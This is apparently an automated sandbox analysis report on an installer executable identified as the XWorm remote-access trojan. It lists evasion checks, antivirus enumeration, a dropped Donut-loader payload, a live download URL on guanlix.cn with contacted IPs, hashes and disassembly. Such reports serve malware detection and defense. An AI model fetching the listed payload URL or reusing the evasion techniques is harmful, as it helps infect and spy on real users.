Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\33__Installer.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\33__Installer.exe	Memory allocated: 3D70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Memory allocated: 4020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Memory allocated: 3E50000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\33__Installer.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\33__Installer.exe	Window / User API: threadDelayed 2052			Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Window / User API: threadDelayed 7787			Jump to behavior

Source: C:\Users\user\Desktop\33__Installer.exe TID: 5920	Thread sleep time: -23980767295822402s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe TID: 5328	Thread sleep count: 2052 > 30	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe TID: 5328	Thread sleep count: 7787 > 30	Jump to behavior

Source: C:\Users\user\Desktop\33__Installer.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\33__Installer.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: 33__Installer.exe, 00000000.00000002.4105093119.000000000147E000.00000004.00000020.00020000.00000000.sdmp, 33__Installer.exe, 00000000.00000002.4105093119.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, 33__Installer.exe, 00000000.00000002.4105093119.00000000014DA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\33__Installer.exe	API call chain: ExitProcess graph end node			graph_0-25488
Source: C:\Users\user\Desktop\33__Installer.exe	API call chain: ExitProcess graph end node			graph_0-25299

Source: C:\Users\user\Desktop\33__Installer.exe

Code function: 0_2_00C2AD72 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00C2AD72

Source: C:\Users\user\Desktop\33__Installer.exe

0_2_00C345F4

Source: C:\Users\user\Desktop\33__Installer.exe

Code function: 0_2_03CB1628 mov eax, dword ptr fs:[00000030h]

0_2_03CB1628

Source: C:\Users\user\Desktop\33__Installer.exe

Code function: 0_2_00C37B91 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_00C37B91

Source: C:\Users\user\Desktop\33__Installer.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_00C2CD6D SetUnhandledExceptionFilter,	0_2_00C2CD6D
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_00C2AD72 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00C2AD72
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: 0_2_00C26FE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00C26FE1

Source: C:\Users\user\Desktop\33__Installer.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004496000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004496000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managert-^q
Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004496000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: @\^q@\^q'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004496000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: 33__Installer.exe, 00000000.00000002.4106039892.0000000004496000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q

Source: C:\Users\user\Desktop\33__Installer.exe

Code function: 0_2_00C21720 cpuid

0_2_00C21720

Source: C:\Users\user\Desktop\33__Installer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	0_2_00C349CA
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_00C34AA4
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00C2FAAD
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_00C2FBA2
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_00C2FCA4
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_00C2FC49
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: GetLocaleInfoA,	0_2_00C34D69
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_00C2FE75
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_00C2FFD8
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_00C2FF9C
Source: C:\Users\user\Desktop\33__Installer.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_00C2FF35

Source: C:\Users\user\Desktop\33__Installer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\33__Installer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\33__Installer.exe

Code function: 0_2_00C24CAA GetSystemTimeAsFileTime,__aulldiv,

0_2_00C24CAA

Source: C:\Users\user\Desktop\33__Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\33__Installer.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 0.2.33__Installer.exe.6160000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.33__Installer.exe.6160000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 33__Installer.exe PID: 6556, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 0.2.33__Installer.exe.6160000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.33__Installer.exe.6160000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 33__Installer.exe PID: 6556, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	131 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	131 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Process Injection	NTDS	131 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	34 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
33__Installer.exe	26%	ReversingLabs	Win32.Trojan.Generic
33__Installer.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://guanlix.cn:881/330.ccp&(	0%	Avira URL Cloud	safe
http://guanlix.cn:881/330.ccp	0%	Avira URL Cloud	safe
117.41.184.33	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
guanlix.cn	91.208.240.157	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
117.41.184.33	true	Avira URL Cloud: safe	unknown
http://guanlix.cn:881/330.ccp	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	33__Installer.exe, 00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://guanlix.cn:881/330.ccp&(	33__Installer.exe, 00000000.00000002.4105093119.00000000014BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.208.240.157	guanlix.cn	unknown		139659	LUCID-AS-APLUCIDACLOUDLIMITEDHK	false
117.41.184.33	unknown	China		134238	CT-JIANGXI-IDCCHINANETJiangxprovinceIDCnetworkCN	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1466312
Start date and time:	2024-07-02 19:23:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	33__Installer.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/2@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 27 Number of non-executed functions: 31
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 33__Installer.exe

Simulations

Behavior and APIs

Time	Type	Description
13:24:07	API Interceptor	7512367x Sleep call for process: 33__Installer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.208.240.157	31__Installer.exe	Get hash	malicious	XWorm	Browse	guanlix.cn:881/31.ccp
	103-o_Installer.exe	Get hash	malicious	XWorm	Browse	guanlix.cn:881/103.ccp
	31-o_Installer.exe	Get hash	malicious	XWorm	Browse	guanlix.cn:881/31.ccp
	33-o_Installer.exe	Get hash	malicious	XWorm	Browse	guanlix.cn:881/33.ccp
117.41.184.33	33-o_Installer.exe	Get hash	malicious	XWorm	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
guanlix.cn	31__Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	103-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	31-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	33-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CT-JIANGXI-IDCCHINANETJiangxprovinceIDCnetworkCN	33-o_Installer.exe	Get hash	malicious	XWorm	Browse	117.41.184.33
	https://seoauthoritybook.com/	Get hash	malicious	Unknown	Browse	106.225.194.35
	skt.m68k.elf	Get hash	malicious	Mirai	Browse	59.63.219.186
	#U5458#U5de5#U8865#U52a9#U6d41#U7a0b.docx.doc	Get hash	malicious	Unknown	Browse	59.63.226.86
	2024#U5e74#U4e8c#U5b63#U5ea6#U5458#U5de5#U8865#U52a9#U6d41#U7a0b.docx.doc	Get hash	malicious	Unknown	Browse	59.63.226.86
	SecuriteInfo.com.Trojan.Siggen22.58997.11289.5716.exe	Get hash	malicious	Poisonivy	Browse	106.225.194.35
	2024#U5e74#U4e00#U5b63#U5ea6#U5458#U5de5#U8865#U52a9#U6d41#U7a0b.docx.doc	Get hash	malicious	Unknown	Browse	59.63.226.86
	2024#U5e74#U4e00#U5b63#U5ea6#U5458#U5de5#U8865#U52a9#U6d41#U7a0b.docx.doc	Get hash	malicious	Unknown	Browse	59.63.226.86
	pKO4Qel23K.elf	Get hash	malicious	Mirai	Browse	59.63.167.214
	JKfLgrv17o.elf	Get hash	malicious	Mirai	Browse	59.63.219.189
LUCID-AS-APLUCIDACLOUDLIMITEDHK	31__Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	103-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	31-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	33-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	https://telegram-wv.icu/	Get hash	malicious	Unknown	Browse	103.143.81.212
	#U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exe	Get hash	malicious	Unknown	Browse	45.136.13.176
	#U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exe	Get hash	malicious	Unknown	Browse	45.136.13.176
	CXM5Rc4W2k.exe	Get hash	malicious	GhostRat	Browse	103.143.81.180
	CXM5Rc4W2k.exe	Get hash	malicious	GhostRat	Browse	103.143.81.180
	dllhostpgd.exe	Get hash	malicious	CobaltStrike	Browse	45.136.14.159

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\Public\Downloads\ind.jpg

Download File

Process:	C:\Users\user\Desktop\33__Installer.exe
File Type:	data
Category:	dropped
Size (bytes):	71938
Entropy (8bit):	7.604676564541333
Encrypted:	false
SSDEEP:	1536:u7rl7/dDEWTG0KHvpLhkUsYywwI6aM6eKXBwLsy1ETqfvu+P4Rtsj5o:enTG0KBLfsYywwTaMRKXBwLs/
MD5:	1BEA636EC9B170D6306D6082552DD002
SHA1:	920644E8AA039A829A58C4EF7065B61208795605
SHA-256:	D90BF4D25240AA036B21D8FDF1F1F3F55CD03C61EAB7F941624F96D3C70AACFC
SHA-512:	DCCDE5A72EF3203CD68AE6497B9D9D5322387F7196F66C1042D16F3F54AB12A6955CBD1E286477089C601041208E8F017D5BDFB003CDBD377054BC975D2139D7
Malicious:	false
Yara Hits:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\Public\Downloads\ind.jpg, Author: unknown
Reputation:	low
Preview:	.......Xm.0N~.2.oi...../:..#E......5.....r..V...Q.Z.....x...G.......2.....\|'......B.u...\...d#..>.....H..n'...H4n...W.......k..>...W4......w..J...Z..$@.../....M?..=o...'.z.....$....%....Y..".).\|.?.Q.:u.]l....L.GP.f.../L.izV..n.Hv...{.Ua.x..BV.OS....\|.$;..@a`.._........}....k....M..'(.............................................................................................................................................................................................................................................................(j...Y....Y.2..I..PZ.P..k<.AT...HYZ.Ip3.7...\..<.m`.......w...(.gw..!.).@{...3....h".l....=.jz.Z^T.V.k^[W...J....\s.>...W.y....N..n..."..j....X....B....d.Z.....L..x. ...{.J1_.\.........<p.N......oND..?=./N.r.*..X<..8.....:P..H.M......Ot.^....\|".X...E...?...i....I'.g...]Ek.....(..E]..F.,..A}..?...t.Q. }5l....\TT...$......N.....fHP9.#3.qKo.x...~..k.k...hN;.........<_.r.m{.o..R.p?..-..E......k.......aj`.=..d..2

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\330[1].ccp

Download File

Process:	C:\Users\user\Desktop\33__Installer.exe
File Type:	data
Category:	dropped
Size (bytes):	71938
Entropy (8bit):	7.604676564541333
Encrypted:	false
SSDEEP:	1536:u7rl7/dDEWTG0KHvpLhkUsYywwI6aM6eKXBwLsy1ETqfvu+P4Rtsj5o:enTG0KBLfsYywwTaMRKXBwLs/
MD5:	1BEA636EC9B170D6306D6082552DD002
SHA1:	920644E8AA039A829A58C4EF7065B61208795605
SHA-256:	D90BF4D25240AA036B21D8FDF1F1F3F55CD03C61EAB7F941624F96D3C70AACFC
SHA-512:	DCCDE5A72EF3203CD68AE6497B9D9D5322387F7196F66C1042D16F3F54AB12A6955CBD1E286477089C601041208E8F017D5BDFB003CDBD377054BC975D2139D7
Malicious:	false
Yara Hits:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\330[1].ccp, Author: unknown
Reputation:	low
Preview:	.......Xm.0N~.2.oi...../:..#E......5.....r..V...Q.Z.....x...G.......2.....\|'......B.u...\...d#..>.....H..n'...H4n...W.......k..>...W4......w..J...Z..$@.../....M?..=o...'.z.....$....%....Y..".).\|.?.Q.:u.]l....L.GP.f.../L.izV..n.Hv...{.Ua.x..BV.OS....\|.$;..@a`.._........}....k....M..'(.............................................................................................................................................................................................................................................................(j...Y....Y.2..I..PZ.P..k<.AT...HYZ.Ip3.7...\..<.m`.......w...(.gw..!.).@{...3....h".l....=.jz.Z^T.V.k^[W...J....\s.>...W.y....N..n..."..j....X....B....d.Z.....L..x. ...{.J1_.\.........<p.N......oND..?=./N.r.*..X<..8.....:P..H.M......Ot.^....\|".X...E...?...i....I'.g...]Ek.....(..E]..F.,..A}..?...t.Q. }5l....\TT...$......N.....fHP9.#3.qKo.x...~..k.k...hN;.........<_.r.m{.o..R.p?..-..E......k.......aj`.=..d..2

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.9386097015607895
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	33__Installer.exe
File size:	247'808 bytes
MD5:	8182ed62008e7526ae7e1f7d702fbcb6
SHA1:	3a3808eefd17f32bc074c739586b6b36c0a06c15
SHA256:	a862efea745fd2c39b097d2e1e1d6961ba4d6f8e5c2823d345c5035b95d44f69
SHA512:	913e79b2613236be7e805dd2c22aceef5fbe9cf408534968aa4ae8dc939dc3eb8a9ee7ba9eb8369d3fed97e6313d0e1183849f9ab7bb84f0e9529064a2b6731b
SSDEEP:	3072:jSg5JZaegxuSS7JY459BaybX1xirH7sO4ZQeAnuTCt2xbzmyoaq6rcYsc8kOeAVS:jt5JPgxcqAKcXWrbNnjZ2x
TLSH:	54344B91F690D4B5D81701B5983ACEB2126BBE798A74018B36D4372F5EB73C31936E0B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{b..{b..{b......ob....<..b..r...\|b..{b..!b....=.Ob......zb......zb..Rich{b..........PE..L....d.f.................v...N.....

File Icon


Icon Hash:	20246c0c56e20926

Static PE Info

General

Entrypoint:	0x406551
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x668364B9 [Tue Jul 2 02:23:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	0b47c746b58dc722dcec07246158fda2

Entrypoint Preview

Instruction
call 00007F8DD44F0E05h
jmp 00007F8DD44E9C9Eh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
test eax, eax
je 00007F8DD44E9E24h
sub eax, 08h
cmp dword ptr [eax], 0000DDDDh
jne 00007F8DD44E9E19h
push eax
call 00007F8DD44E8719h
pop ecx
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov esi, ecx
mov byte ptr [esi+0Ch], 00000000h
test eax, eax
jne 00007F8DD44E9E75h
call 00007F8DD44ED672h
mov dword ptr [esi+08h], eax
mov ecx, dword ptr [eax+6Ch]
mov dword ptr [esi], ecx
mov ecx, dword ptr [eax+68h]
mov dword ptr [esi+04h], ecx
mov ecx, dword ptr [esi]
cmp ecx, dword ptr [0041F1E8h]
je 00007F8DD44E9E24h
mov ecx, dword ptr [0041EFA0h]
test dword ptr [eax+70h], ecx
jne 00007F8DD44E9E19h
call 00007F8DD44F17DFh
mov dword ptr [esi], eax
mov eax, dword ptr [esi+04h]
cmp eax, dword ptr [0041EEA8h]
je 00007F8DD44E9E28h
mov eax, dword ptr [esi+08h]
mov ecx, dword ptr [0041EFA0h]
test dword ptr [eax+70h], ecx
jne 00007F8DD44E9E1Ah
call 00007F8DD44F103Eh
mov dword ptr [esi+04h], eax
mov eax, dword ptr [esi+08h]
test byte ptr [eax+70h], 00000002h
jne 00007F8DD44E9E26h
or dword ptr [eax+70h], 02h
mov byte ptr [esi+0Ch], 00000001h
jmp 00007F8DD44E9E1Ch
mov ecx, dword ptr [eax]
mov dword ptr [esi], ecx
mov eax, dword ptr [eax+04h]
mov dword ptr [esi+04h], eax
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword ptr [0041E910h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
mov edx, dword ptr [ebp+18h]
push ebx

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d7ec	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x22000	0x1c748	.rsrc
